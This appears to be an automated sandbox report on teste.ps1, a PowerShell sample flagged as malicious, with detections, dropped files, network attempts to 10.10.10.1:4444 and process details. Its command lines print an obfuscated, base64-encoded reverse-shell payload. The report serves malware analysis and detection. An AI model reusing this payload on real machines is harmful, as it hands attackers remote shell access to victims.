behaviorgraph top1 signatures2 2 Behavior Graph ID: 1675108 Sample: teste.ps1 Startdate: 26/04/2025 Architecture: WINDOWS Score: 68 21 Sigma detected: Suspicious PowerShell Encoded Command Patterns 2->21 23 AI detected malicious Powershell script 2->23 25 Joe Sandbox ML detected suspicious sample 2->25 27 Sigma detected: Suspicious Encoded PowerShell Command Line 2->27 6 powershell.exe 11 2->6         started        9 svchost.exe 1 1 2->9         started        process3 dnsIp4 29 Malicious encrypted Powershell command line found 6->29 31 Encrypted powershell cmdline option found 6->31 12 powershell.exe 16 6->12         started        15 conhost.exe 6->15         started        17 127.0.0.1 unknown unknown 9->17 signatures5 process6 dnsIp7 19 10.10.10.1, 4444 unknown unknown 12->19

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
teste.ps15%VirustotalBrowse
teste.ps13%ReversingLabs
SAMPLE100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
    		high
    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
            		high
            https://aka.ms/pscore6lBpowershell.exe, 00000000.00000002.1377093945.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1377093945.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://crl.microsoftpowershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.ver)svchost.exe, 00000003.00000002.2364387027.0000017795C00000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1377093945.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious

                                    Private

                                    IP
                                    10.10.10.1
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1675108
                                    Start date and time:2025-04-26 21:04:29 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 23s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:teste.ps1
                                    Detection:MAL
                                    Classification:mal68.bank.evad.winPS1@5/12@0/2
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 21
                                    • Number of non-executed functions: 5
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 69.192.44.226, 131.253.33.254, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7928 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 8100 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    15:05:23API Interceptor45x Sleep call for process: powershell.exe modified
                                    15:05:28API Interceptor2x Sleep call for process: svchost.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):1.3073494710058864
                                    Encrypted:false
                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrs:KooCEYhgYEL0In
                                    MD5:15A36A2D78B70337CF6F4D721277377E
                                    SHA1:CF533EF34652F5487391AC0D5F715F524754991B
                                    SHA-256:77C14BC6D8CF9C5C39474C1E52FE2338686E2ACDA93E4AAC442FCD19A8A420DB
                                    SHA-512:C915066281A96A2BCC148AC0F482E807F2C0FBAA36318A8B3C390D28E1BD83ADBAC52CAE650F57A2E6499BEA83DC28BB9B59C5AEB073A7C4F59C3FF1229CAD55
                                    Malicious:false
                                    Reputation:low
                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x29b037a5, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.42215470962374013
                                    Encrypted:false
                                    SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                    MD5:E9A5708B1ABE0894FFC5C69679D9BB48
                                    SHA1:ECA78455F6B042CFD2EBCF398A56C50328A75EBA
                                    SHA-256:63F0B6E31C8E67DC1124099EF541A7A37D6F5AB89FC32C0F7350A0BE604749CC
                                    SHA-512:9F8113A0878DB79D114B756DDD878F062A3D6DB166D27E653CEA1C48055214333623CCB69066E9475D2556FCF3611E92537D5A7EF30D6E07244B4267EA45C0DD
                                    Malicious:false
                                    Reputation:low
                                    Preview:).7.... .......A.......X\...;...{......................0.!..........{A......}'.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................X.U.....}'..................*.Y.....}'..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.07740235398825662
                                    Encrypted:false
                                    SSDEEP:3:Mb//KYeOTONuGjjn13a/cWYM/lallcVO/lnlZMxZNQl:Mb//Kz6Gj53qc0/AOewk
                                    MD5:A7C0FB7127DC1B8302D62C95B4B57597
                                    SHA1:25C39696043D88E3FFD1CCAC89176F7B733D5971
                                    SHA-256:6DCBF4D88489387D83015593A4E69A4945482801926749C3B5C2AF2FE09F92BF
                                    SHA-512:6F9AFB6F8C3CE455B2FEBF44E7E97434BA95A1848FAE33944EFF4AE9347D3F41DF4541619AFD53497AACABEDE876031B04DC3E6FA58E435D34FA392B32D821F2
                                    Malicious:false
                                    Reputation:low
                                    Preview:.iL[.....................................;...{.......}'......{A..............{A......{A..........{A].................*.Y.....}'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):5829
                                    Entropy (8bit):4.901113710259376
                                    Encrypted:false
                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulp77th:NllU
                                    MD5:7B5F360646F3167812DC4ADF7B166512
                                    SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                    SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                    SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e.................................x..............@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wgvvkdk.xq0.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5n0fy4d2.0kg.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okbw4hix.r3a.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oykelyrs.py2.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AWR4TLWC7PLOMCZRWZYJ.temp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6221
                                    Entropy (8bit):3.738580826961919
                                    Encrypted:false
                                    SSDEEP:48:pYi2TNFR0eLzr3CUU2J5jLukvhkvklCywxEmdrx0pnL7ccSogZoaRrCLx0pnL7ck:E5Aez3Cl+5GkvhkvCCtpyFLAHWyFLAHK
                                    MD5:E600B6BFCD3D186B0FBD2606545D2997
                                    SHA1:29F44FE75EE69D68EA49AA7D41814B0F6B197861
                                    SHA-256:645B0001044B653558F735B63C8917B30E483F8A49B8EB4E7DAC5374EBFB6C92
                                    SHA-512:367E84183E728E2B72BB793369CF67FF5B20CDEC3A0EB4BDE0193A7BE35FBAF57CC56C0E392DCB38459C84D198D8A1DBB05041DADEC5AE773ECADCE276D4DD13
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....'..$...w-.).......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Z.............................%..A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......CW.^.Z............................(PT.R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ9T..Windows.@......CW.^gZ9T..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6221
                                    Entropy (8bit):3.738580826961919
                                    Encrypted:false
                                    SSDEEP:48:pYi2TNFR0eLzr3CUU2J5jLukvhkvklCywxEmdrx0pnL7ccSogZoaRrCLx0pnL7ck:E5Aez3Cl+5GkvhkvCCtpyFLAHWyFLAHK
                                    MD5:E600B6BFCD3D186B0FBD2606545D2997
                                    SHA1:29F44FE75EE69D68EA49AA7D41814B0F6B197861
                                    SHA-256:645B0001044B653558F735B63C8917B30E483F8A49B8EB4E7DAC5374EBFB6C92
                                    SHA-512:367E84183E728E2B72BB793369CF67FF5B20CDEC3A0EB4BDE0193A7BE35FBAF57CC56C0E392DCB38459C84D198D8A1DBB05041DADEC5AE773ECADCE276D4DD13
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....'..$...w-.).......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Z.............................%..A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......CW.^.Z............................(PT.R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ9T..Windows.@......CW.^gZ9T..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                    Static File Info

                                    General

                                    File type:ASCII text, with very long lines (2578), with no line terminators
                                    Entropy (8bit):4.222137623286222
                                    TrID:
                                      File name:teste.ps1
                                      File size:2'578 bytes
                                      MD5:d43f3078147348d65e6d45b0dd8bb9b6
                                      SHA1:26d97115d6dad035bd6b2b3c14fa56871649e3ce
                                      SHA256:b8f1effbb4aa7ce402352b78e0b8aa1245a1e47cf551ce9f15b8235a1d88cdf8
                                      SHA512:4179505181a9a8428f2dc442deb126a7c4eb5086d75716a1d00bbdd31b2b2d3aca2fb47f4bd19a73e318dd59330136caf36539319b21ce972cdb1d320b2af357
                                      SSDEEP:48:ObqXDXbIV9GzB+j2X3Vs4O1Kbw2915VmpVWgbbfnubzpsrbpDMz0ikJvyfnN:GqXLbCGz3s4OI1nmWgvnubI1gfk54N
                                      TLSH:B351BFFDDC36BEC403BE71D42DAA3E8610586613C9B54AF4EA4909E37524348DF396AC
                                      File Content Preview:powershell -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAI

                                      Network Behavior

                                      Download Network PCAP: filteredfull

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 26, 2025 21:05:24.886188984 CEST497144444192.168.2.410.10.10.1
                                      Apr 26, 2025 21:05:25.901607037 CEST497144444192.168.2.410.10.10.1
                                      Apr 26, 2025 21:05:27.917243004 CEST497144444192.168.2.410.10.10.1
                                      Apr 26, 2025 21:05:31.917256117 CEST497144444192.168.2.410.10.10.1
                                      Apr 26, 2025 21:05:39.917280912 CEST497144444192.168.2.410.10.10.1

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      • File
                                      • Registry

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:15:05:22
                                      Start date:26/04/2025
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1"
                                      Imagebase:0xb60000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      Show Windows behavior

                                      Registry Activities

                                      Powershell Activities

                                      Show Windows behavior

                                      Mutex Activities

                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      Process Token Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:1
                                      Start time:15:05:22
                                      Start date:26/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Mutex Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:2
                                      Start time:15:05:22
                                      Start date:26/04/2025
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3